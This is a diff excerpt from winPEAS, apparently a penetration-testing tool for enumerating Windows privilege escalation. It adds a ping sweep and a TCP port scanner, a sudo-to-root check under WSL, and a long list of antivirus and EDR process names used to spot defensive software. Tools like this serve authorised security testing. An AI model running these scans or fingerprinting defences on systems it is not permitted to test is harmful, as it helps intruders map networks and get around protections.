var cmd = CreateUnixCommand("echo -n '' | sudo -S su root -c whoami", distributionName);
var output = ExecuteCommandWaitForOutput(cmd.Item1, cmd.Item2);
if (output == "root")
{
return $"root ({exploit})";
}
return wslUser;
}
private static string ExecuteCommandWaitForOutput(string cmd, string args)
{
Process p = new Process();
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.FileName = cmd;
p.StartInfo.Arguments = args;
p.StartInfo.StandardOutputEncoding = Encoding.UTF8;
p.Start();
string output = p.StandardOutput.ReadToEnd()?.Trim();
p.WaitForExit();
return output;
}
private static void ExecuteCommand(
string command,
string args = null,
string workingFolder = null
)
{
var processStartInfo = new ProcessStartInfo
{
UseShellExecute = false,
Verb = "OPEN",
CreateNoWindow = true,
FileName = command,
WorkingDirectory = workingFolder,
Arguments = args,
RedirectStandardOutput = true,
RedirectStandardError = true,
StandardOutputEncoding = Encoding.UTF8
};
using (var process = Process.Start(processStartInfo))
{
if (process != null)
{
while (!process.StandardOutput.EndOfStream)
{
Console.WriteLine(process.StandardOutput.ReadLine());
}
while (!process.StandardError.EndOfStream)
{
Console.WriteLine(process.StandardError.ReadLine());
}
}
}
}
}
}

56
winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetPinger.cs Normal file
View File

@ -0,0 +1,56 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Net;
using System.Net.NetworkInformation;
using System.Threading.Tasks;
namespace winPEAS.Info.NetworkInfo.NetworkScanner
{
internal class NetPinger
{
private int PingTimeout = 1000;
public List<string> HostsAlive = new List<string>();
private List<string> ipRange = new List<string>();
public void AddRange(string baseIpAddress, string netmask)
{
var addresses = NetworkUtils.GetIPAddressesByNetmask(baseIpAddress, netmask).ToList();
var range = NetworkUtils.GetIPRange(IPAddress.Parse(addresses[0]), IPAddress.Parse(addresses[1]));
ipRange.AddRange(range);
}
public void AddRange(IEnumerable<string> ipAddressList)
{
ipRange.AddRange(ipAddressList);
}
public async Task RunPingSweepAsync()
{
var tasks = new List<Task>();
foreach (var ip in ipRange)
{
Ping p = new Ping();
var task = PingAndUpdateStatus(p, ip);
tasks.Add(task);
}
await Task.WhenAll(tasks);
}
private async Task PingAndUpdateStatus(Ping ping, string ip)
{
var reply = await ping.SendPingAsync(ip, PingTimeout);
if (reply.Status == IPStatus.Success)
{
HostsAlive.Add(ip);
await Console.Out.WriteLineAsync(ip);
}
}
}
}

93
winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkScanner.cs Normal file
View File

@ -0,0 +1,93 @@
using System;
using System.Collections.Generic;
using System.Threading.Tasks;
using winPEAS.Helpers;
namespace winPEAS.Info.NetworkInfo.NetworkScanner
{
internal class NetworkScanner
{
enum ScanMode
{
Auto,
IPAddressList,
IPAddressNetmask,
}
private string[] ipAddressList;
private bool isAuto = false;
private ScanMode scanMode = ScanMode.IPAddressList;
private string baseAddress;
private string netmask;
IEnumerable<int> ports;
public NetworkScanner(string options, IEnumerable<int> ports = null)
{
/*
--network "auto" - find interfaces/hosts automatically
--network "10.10.10.10,10.10.10.20" - scan only selected ip address(es)
--network "10.10.10.10/24" - scan host based on ip address/netmask
*/
this.ports = ports;
if (string.Equals(options, "auto", StringComparison.InvariantCultureIgnoreCase))
{
scanMode = ScanMode.Auto;
}
else if (options.Contains("/"))
{
var parts = options.Split('/');
baseAddress = parts[0];
netmask = parts[1];
scanMode = ScanMode.IPAddressNetmask;
}
else
{
ipAddressList = options.Split(',');
scanMode = ScanMode.IPAddressList;
}
}
public void Scan()
{
try
{
Beaprint.GreatPrint("Scanning network (it might take some time)...");
List<string> aliveHosts = new List<string>();
NetPinger netPinger = new NetPinger();
if (scanMode == ScanMode.Auto)
{
// this is the "auto" mode
foreach (var ipAddressAndNetmask in NetworkUtils.GetInternalInterfaces())
{
netPinger.AddRange(ipAddressAndNetmask.Item1, ipAddressAndNetmask.Item2);
}
}
if (scanMode == ScanMode.IPAddressNetmask)
{
netPinger.AddRange(baseAddress, netmask);
}
else if (scanMode == ScanMode.IPAddressList)
{
netPinger.AddRange(ipAddressList);
}
var task = netPinger.RunPingSweepAsync();
task.Wait();
aliveHosts.AddRange(netPinger.HostsAlive);
PortScanner ps = new PortScanner(this.ports);
Parallel.ForEach(aliveHosts, host =>
{
ps.Start(host);
});
}
catch (Exception e)
{
Beaprint.PrintException(e.Message);
}
}
}
}

221
winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/NetworkUtils.cs Normal file
View File

@ -0,0 +1,221 @@
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.NetworkInformation;
namespace winPEAS.Info.NetworkInfo.NetworkScanner
{
internal static class NetworkUtils
{
/// <summary>
/// IPAddress to UInteger
/// </summary>
/// <param name="ipAddress"></param>
/// <returns></returns>
public static uint IPToUInt(this string ipAddress)
{
if (string.IsNullOrEmpty(ipAddress))
return 0;
if (IPAddress.TryParse(ipAddress, out IPAddress ip))
{
var bytes = ip.GetAddressBytes();
Array.Reverse(bytes);
return BitConverter.ToUInt32(bytes, 0);
}
else
return 0;
}
/// <summary>
/// IP in Uinteger to string
/// </summary>
/// <param name="ipUInt"></param>
/// <returns></returns>
public static string IPToString(this uint ipUInt)
{
return ToIPAddress(ipUInt).ToString();
}
/// <summary>
/// IP in Uinteger to IPAddress
/// </summary>
/// <param name="ipUInt"></param>
/// <returns></returns>
public static IPAddress ToIPAddress(this uint ipUInt)
{
var bytes = BitConverter.GetBytes(ipUInt);
Array.Reverse(bytes);
return new IPAddress(bytes);
}
/// <summary>
/// First and Last IPv4 from IP + Mask
/// </summary>
/// <param name="ipv4"></param>
/// <param name="mask">Accepts CIDR or IP. Example 255.255.255.0 or 24</param>
/// <param name="filterUsable">Removes not usable IPs from Range</param>
/// <returns></returns>
/// <remarks>
/// If ´filterUsable=false´ first IP is not usable and last is reserved for broadcast.
/// </remarks>
public static string[] GetIpRange(string ipv4, string mask, bool filterUsable)
{
uint[] uiIpRange = GetIpUintRange(ipv4, mask, filterUsable);
return Array.ConvertAll(uiIpRange, x => IPToString(x));
}
/// <summary>
/// First and Last IPv4 + Mask.
/// </summary>
/// <param name="ipv4"></param>
/// <param name="mask">Accepts CIDR or IP. Example 255.255.255.0 or 24</param>
/// <param name="filterUsable">Removes not usable IPs from Range</param>
/// <returns></returns>
/// <remarks>
/// First IP is not usable and last is reserverd for broadcast.
/// Can use all IPs in between
/// </remarks>
public static uint[] GetIpUintRange(string ipv4, string mask, bool filterUsable)
{
uint sub;
//check if mask is CIDR Notation
if (mask.Contains("."))
{
sub = IPToUInt(mask);
}
else
{
sub = ~(0xffffffff >> Convert.ToInt32(mask));
}
uint ip2 = IPToUInt(ipv4);
uint first = ip2 & sub;
uint last = first | (0xffffffff & ~sub);
if (filterUsable)
{
first += 1;
last -= 1;
}
return new uint[] { first, last };
}
public static IEnumerable<string> GetIPRange(IPAddress startIP, IPAddress endIP)
{
uint sIP = ipToUint(startIP.GetAddressBytes());
uint eIP = ipToUint(endIP.GetAddressBytes());
while (sIP <= eIP)
{
yield return new IPAddress(reverseBytesArray(sIP)).ToString();
sIP++;
}
}
public static string CidrToNetmask(int cidr)
{
var nmask = 0xFFFFFFFF;
nmask <<= 32 - cidr;
byte[] bytes = BitConverter.GetBytes(nmask);
Array.Reverse(bytes);
nmask = BitConverter.ToUInt32(bytes, 0);
var netmask = new System.Net.IPAddress(nmask);
return netmask.ToString();
}
public static IEnumerable<string> GetIPAddressesByNetmask(string ipAddress, string netmask)
{
// TODO
// e.g.
// netmask should be e.g. 24 - currently we only support this format
string[] range = NetworkUtils.GetIpRange(ipAddress, netmask, false);
return range;
}
public static IEnumerable<string> GetHostsByIPAndNetmask(string ipAddressAndNetmask)
{
// TODO
// get hosts by ip address & netmask
// https://itecnote.com/tecnote/c-proper-way-to-scan-a-range-of-ip-addresses/
// we nned to (maybe in parallel)
// - ping e.g. 3 times
// - scan top 5 ports
var parts = ipAddressAndNetmask.Split(':');
return new List<string>
{
parts[0]
};
}
public static List<Tuple<string, string>> GetInternalInterfaces()
{
List<Tuple<string, string>> result = new List<Tuple<string, string>>();
foreach (NetworkInterface ni in NetworkInterface.GetAllNetworkInterfaces())
{
if (ni.OperationalStatus == OperationalStatus.Up &&
(ni.NetworkInterfaceType == NetworkInterfaceType.Wireless80211 || ni.NetworkInterfaceType == NetworkInterfaceType.Ethernet))
{
// Console.WriteLine();
foreach (UnicastIPAddressInformation ip in ni.GetIPProperties().UnicastAddresses)
{
if (ip.Address.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork)
{
// we need ip address and a netmask as well
result.Add(new Tuple<string, string>(ip.Address.ToString(), ip.IPv4Mask.ToString()));
}
}
}
}
return result;
}
/* Convert bytes array to 32 bit long value */
static uint ipToUint(byte[] ipBytes)
{
ByteConverter bConvert = new ByteConverter();
uint ipUint = 0;
int shift = 24; // indicates number of bits left for shifting
foreach (byte b in ipBytes)
{
if (ipUint == 0)
{
ipUint = (uint)bConvert.ConvertTo(b, typeof(uint)) << shift;
shift -= 8;
continue;
}
if (shift >= 8)
ipUint += (uint)bConvert.ConvertTo(b, typeof(uint)) << shift;
else
ipUint += (uint)bConvert.ConvertTo(b, typeof(uint));
shift -= 8;
}
return ipUint;
}
/* reverse byte order in array */
private static uint reverseBytesArray(uint ip)
{
byte[] bytes = BitConverter.GetBytes(ip);
bytes = bytes.Reverse().ToArray();
return (uint)BitConverter.ToInt32(bytes, 0);
}
}
}

122
winPEAS/winPEASexe/winPEAS/Info/NetworkInfo/NetworkScanner/PortScanner.cs Normal file
View File

@ -0,0 +1,122 @@
using System;
using System.Collections.Generic;
using System.Net.Sockets;
using System.Threading;
using System.Threading.Tasks;
namespace winPEAS.Info.NetworkInfo.NetworkScanner
{
class PortScanner
{
private int TcpTimeout = 500; // ms
#region nmap tcp top 1000
static List<int> nmapTop1000TCPPorts = new List<int>
{
1,3,4,6,7,9,13,17,19,20,21,22,23,24,25,26,30,32,33,37,42,43,49,53,70,79,80,81,82,83,84,85,88,89,90,99,100,106,109,110,111,113,119,125,135,139,143,144,146,161,163,
179,199,211,212,222,254,255,256,259,264,280,301,306,311,340,366,389,406,407,416,417,425,427,443,444,445,458,464,465,481,497,500,512,513,514,515,524,541,543,544,545,
548,554,555,563,587,593,616,617,625,631,636,646,648,666,667,668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800,801,808,843,873,880,888,898,900,901,
902,903,911,912,981,987,990,992,993,995,999,1000,1001,1002,1007,1009,1010,1011,1021,1022,1023,1024,1025,1026,1027,1028,1029,1030,1031,1032,1033,1034,1035,1036,1037,
1038,1039,1040,1041,1042,1043,1044,1045,1046,1047,1048,1049,1050,1051,1052,1053,1054,1055,1056,1057,1058,1059,1060,1061,1062,1063,1064,1065,1066,1067,1068,1069,1070,
1071,1072,1073,1074,1075,1076,1077,1078,1079,1080,1081,1082,1083,1084,1085,1086,1087,1088,1089,1090,1091,1092,1093,1094,1095,1096,1097,1098,1099,1100,1102,1104,1105,
1106,1107,1108,1110,1111,1112,1113,1114,1117,1119,1121,1122,1123,1124,1126,1130,1131,1132,1137,1138,1141,1145,1147,1148,1149,1151,1152,1154,1163,1164,1165,1166,1169,
1174,1175,1183,1185,1186,1187,1192,1198,1199,1201,1213,1216,1217,1218,1233,1234,1236,1244,1247,1248,1259,1271,1272,1277,1287,1296,1300,1301,1309,1310,1311,1322,1328,
1334,1352,1417,1433,1434,1443,1455,1461,1494,1500,1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687,1688,1700,1717,1718,1719,1720,1721,1723,1755,
1761,1782,1783,1801,1805,1812,1839,1840,1862,1863,1864,1875,1900,1914,1935,1947,1971,1972,1974,1984,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,
2013,2020,2021,2022,2030,2033,2034,2035,2038,2040,2041,2042,2043,2045,2046,2047,2048,2049,2065,2068,2099,2100,2103,2105,2106,2107,2111,2119,2121,2126,2135,2144,2160,
2161,2170,2179,2190,2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381,2382,2383,2393,2394,2399,2401,2492,2500,2522,2525,2557,2601,2602,2604,2605,2607,2608,2638,
2701,2702,2710,2717,2718,2725,2800,2809,2811,2869,2875,2909,2910,2920,2967,2968,2998,3000,3001,3003,3005,3006,3007,3011,3013,3017,3030,3031,3052,3071,3077,3128,3168,
3211,3221,3260,3261,3268,3269,3283,3300,3301,3306,3322,3323,3324,3325,3333,3351,3367,3369,3370,3371,3372,3389,3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689,
3690,3703,3737,3766,3784,3800,3801,3809,3814,3826,3827,3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000,4001,4002,4003,4004,4005,
4006,4045,4111,4125,4126,4129,4224,4242,4279,4321,4343,4443,4444,4445,4446,4449,4550,4567,4662,4848,4899,4900,4998,5000,5001,5002,5003,5004,5009,5030,5033,5050,5051,
5054,5060,5061,5080,5087,5100,5101,5102,5120,5190,5200,5214,5221,5222,5225,5226,5269,5280,5298,5357,5405,5414,5431,5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,
5633,5666,5678,5679,5718,5730,5800,5801,5802,5810,5811,5815,5822,5825,5850,5859,5862,5877,5900,5901,5902,5903,5904,5906,5907,5910,5911,5915,5922,5925,5950,5952,5959,
5960,5961,5962,5963,5987,5988,5989,5998,5999,6000,6001,6002,6003,6004,6005,6006,6007,6009,6025,6059,6100,6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,
6565,6566,6567,6580,6646,6666,6667,6668,6669,6689,6692,6699,6779,6788,6789,6792,6839,6881,6901,6969,7000,7001,7002,7004,7007,7019,7025,7070,7100,7103,7106,7200,7201,
7402,7435,7443,7496,7512,7625,7627,7676,7741,7777,7778,7800,7911,7920,7921,7937,7938,7999,8000,8001,8002,8007,8008,8009,8010,8011,8021,8022,8031,8042,8045,8080,8081,
8082,8083,8084,8085,8086,8087,8088,8089,8090,8093,8099,8100,8180,8181,8192,8193,8194,8200,8222,8254,8290,8291,8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651,
8652,8654,8701,8800,8873,8888,8899,8994,9000,9001,9002,9003,9009,9010,9011,9040,9050,9071,9080,9081,9090,9091,9099,9100,9101,9102,9103,9110,9111,9200,9207,9220,9290,
9415,9418,9485,9500,9502,9503,9535,9575,9593,9594,9595,9618,9666,9876,9877,9878,9898,9900,9917,9929,9943,9944,9968,9998,9999,10000,10001,10002,10003,10004,10009,10010,
10012,10024,10025,10082,10180,10215,10243,10566,10616,10617,10621,10626,10628,10629,10778,11110,11111,11967,12000,12174,12265,12345,13456,13722,13782,13783,14000,14238,
14441,14442,15000,15002,15003,15004,15660,15742,16000,16001,16012,16016,16018,16080,16113,16992,16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,
19842,20000,20005,20031,20221,20222,20828,21571,22939,23502,24444,24800,25734,25735,26214,27000,27352,27353,27355,27356,27715,28201,30000,30718,30951,31038,31337,32768,
32769,32770,32771,32772,32773,32774,32775,32776,32777,32778,32779,32780,32781,32782,32783,32784,32785,33354,33899,34571,34572,34573,35500,38292,40193,40911,41511,42510,
44176,44442,44443,44501,45100,48080,49152,49153,49154,49155,49156,49157,49158,49159,49160,49161,49163,49165,49167,49175,49176,49400,49999,50000,50001,50002,50003,50006,
50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055,55056,55555,55600,56737,56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,
64623,64680,65000,65129,65389
};
#endregion
private struct TcpPortState
{
public TcpClient MainClient { get; set; }
public bool IsTcpPortOpen { get; set; }
}
IEnumerable<int> portsToScan = nmapTop1000TCPPorts;
public PortScanner(IEnumerable<int> ports)
{
if (ports != null)
{
portsToScan = ports;
}
}
public void Start(string host)
{
Parallel.ForEach(portsToScan, port =>
{
RunScanTcp(host, port);
});
}
public void RunScanTcp(string host, int port)
{
Thread.Sleep(1);
var newClient = new TcpClient();
var state = new TcpPortState
{
MainClient = newClient,
IsTcpPortOpen = true
};
IAsyncResult ar = newClient.BeginConnect(host, port, AsyncCallback, state);
state.IsTcpPortOpen = ar.AsyncWaitHandle.WaitOne(TcpTimeout, false);
if (state.IsTcpPortOpen == false || newClient.Connected == false)
{
return;
}
Console.WriteLine("[+] Open TCP port at: {0}:{1}", host, port);
}
void AsyncCallback(IAsyncResult asyncResult)
{
var state = (TcpPortState)asyncResult.AsyncState;
TcpClient client = state.MainClient;
try
{
client.EndConnect(asyncResult);
}
catch
{
return;
}
if (client.Connected && state.IsTcpPortOpen)
{
return;
}
client.Close();
}
}
}

751
winPEAS/winPEASexe/winPEAS/Info/ProcessInfo/DefensiveProcesses.cs
View File

@ -4,664 +4,103 @@ namespace winPEAS.Info.ProcessInfo
{ {
static class DefensiveProcesses static class DefensiveProcesses
{ {
public static Dictionary<string, string> Definitions = new Dictionary<string, string>() private static Dictionary<string, HashSet<string>> Definitions = new Dictionary<string, HashSet<string>>()
{ {
{"mcshield.exe" , "McAfee AV"}, { "ALYac", new HashSet<string>() { "alyac.exe", "aylaunch.exe", "asmsetup.exe", } },
{"windefend.exe" , "Windows Defender AV"}, { "AVG Antivirus", new HashSet<string>() { "avgui.exe", } },
{"MSASCui.exe" , "Windows Defender AV"}, { "AVG", new HashSet<string>() { "avgemc.exe", "afwserv.exe", "avgsvc.exe", "aswidsagent.exe", } },
{"MSASCuiL.exe" , "Windows Defender AV"}, { "Ad-Aware Total Security by Lavasoft", new HashSet<string>() { "ffcachetool.exe", "avktray.exe", "gdsc.exe", "bootcdwizard.exe", "avkservice.exe", "ask.exe", "avkwctlx64.exe", "gdfwadmin.exe", "avktuner.exe", "initinst.exe", "gdfwsvc.exe", "avk.exe", "avkwscpe.exe", "avkwctl.exe", "avktunerservice.exe", "mkisofs.exe", "gdfirewalltray.exe", "initinstx64.exe", "gdgadgetinst32.exe", "gdfwsvcx64.exe", "aawtray.exe", } },
{"msmpeng.exe" , "Windows Defender AV"}, { "AhnLab-V3", new HashSet<string>() { "aup80if.ex", "v3ui.exe", "v3medic.exe", "v3lite.exe", "v3l4cli.exe", } },
{"msmpsvc.exe" , "Windows Defender AV"}, { "Antiy-AVL", new HashSet<string>() { "avl.exe", } },
{"WRSA.exe" , "WebRoot AV"}, { "Arcabit", new HashSet<string>() { "arcavir.exe", "arcaconfsv.exe", "arcabit.core.loggingservice.exe", "arcabit.core.configurator2.exe", "arcabit.exe", } },
{"savservice.exe" , "Sophos AV"}, { "Avast Antivirus", new HashSet<string>() { "avastui.exe", } },
{"TMCCSF.exe" , "Trend Micro AV"}, { "Avast", new HashSet<string>() { "avast-antivirus.exe", "avastsvc.exe", "ashserv.exe", } },
{"symantec antivirus.exe" , "Symantec AV"}, { "Avira", new HashSet<string>() { "avira.webapphost.exe", } },
{"mbae.exe" , "MalwareBytes Anti-Exploit"}, { "Baidu", new HashSet<string>() { "bav.exe", "bavcloud.exe", "bavhm.exe", "bavsvc.exe", "bavtray.exe", "bavupdater.exe", "bavbsreport.exe", } },
{"parity.exe" , "Bit9 application whitelisting"}, { "BitDefender", new HashSet<string>() { "epprotectedservice.exe", "epsecurityservice.exe", "epupdateservice.exe", "epupdateserver.exe", "bdagent.exe", } },
{"cb.exe" , "Carbon Black behavioral analysis"}, { "Bkav Pro", new HashSet<string>() { "bkavutil.exe", "bkav.exe", "bkavpro.exe", "bkavservice.exe", } },
{"bds-vision.exe" , "BDS Vision behavioral analysis"}, { "CMC", new HashSet<string>() { "cmcpanel.exe", "cmccore.exe", "cmctrayicon.exe", } },
{"Triumfant.exe" , "Triumfant behavioral analysis"}, { "Cisco", new HashSet<string>() { "sfc.exe", } },
{"CSFalcon.exe" , "CrowdStrike Falcon EDR"}, { "ClamAV", new HashSet<string>() { "clamscan.exe", "freshclam.exe", } },
{"ossec.exe" , "OSSEC intrusion detection"}, { "Comodo", new HashSet<string>() { "cavwp.exe", "cfp.exe", } },
{"TmPfw.exe" , "Trend Micro firewall"}, { "CrowdStrike Falcon", new HashSet<string>() { "falconsensorwinos.exe", } },
{"dgagent.exe" , "Verdasys Digital Guardian DLP"}, { "Cybereason", new HashSet<string>() { "cybereasonransomfreeservicehost.exe", } },
{"kvoop.exe" , " DLP process" }, { "Cylance", new HashSet<string>() { "cylancesvc.exe", } },
{"AAWTray.exe" , ""}, { "Cynet", new HashSet<string>() { "cynet.exe", "cexplore.exe", "cynet.zerologondetector.exe", } },
{"ackwin32.exe" , ""}, { "Cyradar", new HashSet<string>() { "cyradarexecutorservices.exe", "cyradaredr.exe", "cyradares.exe", } },
{"Ad-Aware.exe" , ""}, { "DrWeb", new HashSet<string>() { "dwscancl.exe", "drwebsettingprocess.exe", "dwsysinfo.exe", "drwupsrv.exe", "dwnetfilter.exe", "dwscanner.exe", "dwservice.exe", "frwl_notify.exe", "frwl_svc.exe", "spideragent.exe", "spideragent_adm.exe", } },
{"adaware.exe" , ""}, { "ESET-NOD32", new HashSet<string>() { "eraagent.exe", "shouldiremoveit.com", "ecmd.exe", "egui.exe", } },
{"advxdwin.exe" , ""}, { "F-Secure", new HashSet<string>() { "fsav32.exe", "fsdfwd.exe", "fsguiexe.exe", "fsav.exe", } },
{"agentsvr.exe" , ""}, { "G Data AntiVirus", new HashSet<string>() { "bootcdwizard.exe", "avkservice.exe", "avktray.exe", "gdgadgetinst32.exe", "ransomwareremovalhelper.exe", "gdlog.exe", "sec.exe", "avkwctlx64.exe", "updategui.exe", "avk.exe", "autorundelayloader.exe", "avkcmd.exe", "avkwscpe.exe", "iupdateavk.exe", } },
{"agentw.exe" , ""}, { "GridinSoft Anti-Malware", new HashSet<string>() { "uninst.exe", "gtkmgmtc.exe", "tkcon.exe", "unpacker.exe", } },
{"alertsvc.exe" , ""}, { "IObit Malware Fighter 3", new HashSet<string>() { "imfantivirususb.exe", "actioncenterdownloader.exe", "adsremovalsetup.exe", "feedback.exe", "iobituninstal.exe", "sendbugreport.exe", "imf_iobitdel.exe", "imfantivirustips.exe", "promote.exe", "imfupdater.exe", "imf_actioncenterdownloader.exe", "imfregister.exe", "reprocess.exe", "imfsrv_iobitdel.exe", "liveupdate.exe", "xmaspromote.exe", "spsetup.exe", "imf_downconfig.exe", "uninstallpromote.exe", "bluebirdinit.exe", "imftips.exe", "locallang.exe", "imfinstaller.exe", "aupdate.exe", "startmenu.exe", "iwsimfxp.exe", "ppuninstaller.exe", "taskschedule.exe", "fixplugin.exe", "imfantivirusfix.exe", "imfbigupgrade.exe", "imftips_iobitdel.exe", "imfsrv.exe", "iobitcommunities.exe", "autoupdate.exe", "unins000.exe", "homepage.exe", } },
{"alevir.exe" , ""}, { "IObit Malware Fighter 6", new HashSet<string>() { "iwsimf_av.exe", "imfantivirususb.exe", "feedback.exe", "sendbugreportnew.exe", "ransomware.exe", "imfantivirustips.exe", "imfdbupdatestat.exe", "imf_actioncenterdownloader.exe", "iwsimf.exe", "browserprotect.exe", "driverscan.exe", "imfregister.exe", "reprocess.exe", "liveupdate.exe", "christmas.exe", "bf.exe", "imf_downconfig.exe", "browsercleaner.exe", "antitracking.exe", "bluebirdinit.exe", "imftips.exe", "imfinstaller.exe", "locallang.exe", "carescan.exe", "imfsrvwsc.exe", "safebox.exe", "aupdate.exe", "iobitliveupdate.exe", "imfchecker.exe", "iwsimfxp.exe", "ppuninstaller.exe", "imfantivirusfix.exe", "imfbigupgrade.exe", "exclusivepsimf.exe", "imfanalyzer.exe", "bfimf.exe", "imfsrv.exe", "autoupdate.exe", "spinit.exe", "homepage.exe", "dugtrio.exe", } },
{"alogserv.exe" , ""}, { "IObit Security 360", new HashSet<string>() { "is360tray.exe", "is360init.exe", "is360srv.exe", "e_privacysweeper.exe", "a_hijackscan.exe", "g_portable.exe", "d_powerfuldelete.exe", "b_securityholes.exe", "is360updater.exe", "unins000.exe", "f_pctuneup.exe", "imf_freesoftwaredownloader.exe", "c_passivedefense.exe", } },
{"amon9x.exe" , ""}, { "K7AntiVirus Plus by K7 Computing Pvt Ltd", new HashSet<string>() { "healthmon.exe", "k7avqrnt.exe", "k7tliehistory.exe", "k7tlusbvaccine.exe", "k7tsalrt.exe", "k7tlwintemp.exe", "k7tlinettemp.exe", "k7tshlpr.exe", "k7disinfectorgui.exe", "k7tlvirtkey.exe", "k7tlmtry.exe", "k7fwsrvc.exe", "k7tsecurity.exe", "k7avmscn.exe", "k7ctscan.exe", "k7tsecurityuninstall.exe", "k7rtscan.exe", "k7avscan.exe", "k7crvsvc.exe", "k7tsdbg.exe", "k7emlpxy.exe", } },
{"anti-trojan.exe" , ""}, { "K7AntiVirus Premium by K7 Computing Pvt Ltd", new HashSet<string>() { "k7quervarcleaningtool.exe", "k7ndfhlpr.exe", "healthmon.exe", "k7avqrnt.exe", "k7tliehistory.exe", "k7tlusbvaccine.exe", "k7tsstart.exe", "k7tsalrt.exe", "k7tlwintemp.exe", "k7mebezatencremovaltool.exe", "k7tlinettemp.exe", "k7tsmain.exe", "k7tshlpr.exe", "k7tssplh.exe", "k7disinfectorgui.exe", "k7tlvirtkey.exe", "k7tlmtry.exe", "k7fwsrvc.exe", "k7tsreminder.exe", "k7tsecurity.exe", "k7avmscn.exe", "k7ctscan.exe", "k7rtscan.exe", "k7tsnews.exe", "k7avscan.exe", "k7crvsvc.exe", "k7emlpxy.exe", "k7tsupdt.exe", } },
{"antivirus.exe" , ""}, { "Kaspersky Anti-Ransomware Tool for Business", new HashSet<string>() { "anti_ransom_gui.exe", "dump_writer_agent.exe", "anti_ransom.exe", } },
{"ants.exe" , ""}, { "Kaspersky Anti-Virus 2011", new HashSet<string>() { "kldw.exe", } },
{"apimonitor.exe" , ""}, { "Kaspersky Anti-Virus 2013", new HashSet<string>() { "ffcert.exe", } },
{"aplica32.exe" , ""}, { "Kaspersky Anti-Virus Personal", new HashSet<string>() { "kavsend.exe", "kavsvc.exe", "getsysteminfo.exe", "uninstall.exe", } },
{"apvxdwin.exe" , ""}, { "Kaspersky Antivirus", new HashSet<string>() { "avp.exe", } },
{"arr.exe" , ""}, { "Kaspersky", new HashSet<string>() { "klnagent.exe", } },
{"atcon.exe" , ""}, { "Malwarebytes", new HashSet<string>() { "mbam.exe", "mbar.exe", "mbae.exe", } },
{"atguard.exe" , ""}, { "McAfee All Access AntiVirus Plus", new HashSet<string>() { "compatibilitytester.exe", "mispreg.exe", "mcods.exe", "mcvsmap.exe", "mcocrollback.exe", "mpfalert.exe", "mcvulalert.exe", "mvsinst.exe", "mcupdmgr.exe", "mcpvtray.exe", "mcvuladmagnt.exe", "mcvulunpk.exe", "qcshm.exe", "mcoemmgr.exe", "qcconsol.exe", "mcuihost.exe", "mcvsshld.exe", "mcinstru.exe", "mcvulcon.exe", "mcsync.exe", "firesvc.exe", "qccons32.exe", "mcsvrcnt.exe", "mcvulusragnt.exe", "shrcl.exe", "mcodsscan.exe", "mcapexe.exe", "mcautoreg.exe", "mcinfo.exe", "mcvulctr.exe", "svcdrv.exe", } },
{"atro55en.exe" , ""}, { "McAfee AntiSpyware", new HashSet<string>() { "msssrv.exe", "mcspy.exe", "msscli.exe", } },
{"atupdater.exe" , ""}, { "McAfee AntiVirus Plus", new HashSet<string>() { "mispreg.exe", "mcvsmap.exe", "mcods.exe", "mcactinst.exe", "mcocrollback.exe", "mpfalert.exe", "mcinsupd.exe", "langsel.exe", "mvsinst.exe", "mcshell.exe", "mfehidin.exe", "mchlp32.exe", "mcupdmgr.exe", "saupd.exe", "uninstall.exe", "mcawfwk.exe", "qcshm.exe", "mcsacore.exe", "mcoemmgr.exe", "qcconsol.exe", "mcuihost.exe", "mcinstru.exe", "mcvsshld.exe", "mcoobeof.exe", "mcsync.exe", "firesvc.exe", "qccons32.exe", "saui.exe", "mcsvrcnt.exe", "shrcl.exe", "mcsmtfwk.exe", "mcautoreg.exe", "mcuninst.exe", "mcinfo.exe", "actutil.exe", } },
{"atwatch.exe" , ""}, { "McAfee Antivirus", new HashSet<string>() { "mcafee.exe", } },
{"au.exe" , ""}, { "NANO Antivirus beta by Nano Security Ltd", new HashSet<string>() { "nanoreportc64.exe", "nanorst.exe", "uninstall.exe", "nanoreport.exe", "nanosvc.exe", "nanoav64.exe", "nanoreportc.exe", } },
{"aupdate.exe" , ""}, { "NANO-Antivirus", new HashSet<string>() { "nanoav.exe", } },
{"auto-protect.nav80try.exe", ""}, { "Norton Antivirus", new HashSet<string>() { "nortonsecurity.exe", } },
{"autodown.exe" , ""}, { "PCMatic", new HashSet<string>() { "pcmaticpushcontroller.exe", "pcmaticrt.exe", } },
{"autoruns.exe" , ""}, { "Panda Security", new HashSet<string>() { "psanhost.exe", } },
{"autorunsc.exe" , ""}, { "Panda", new HashSet<string>() { "avengine.exe", } },
{"autotrace.exe" , ""}, { "Quick Heal AntiVirus Pro", new HashSet<string>() { "delnboot.exe", "0000007c_afupdfny.exe", "asmain.exe", "asclsrvc.exe", "acappaa.exe", "activate.exe", } },
{"autoupdate.exe" , ""}, { "Quick Heal Total Security", new HashSet<string>() { "delnboot.exe", "contact.exe", "activate.exe", "acappaa.exe", } },
{"avconsol.exe" , ""}, { "Sophos Anti-Rootkit 1.5.0", new HashSet<string>() { "helper.exe", "svrtcli.exe", "sctcleanupservice.exe", "native.exe", "svrtservice.exe", "svrtgui.exe", "sarcli.exe", "sctboottasks.exe", } },
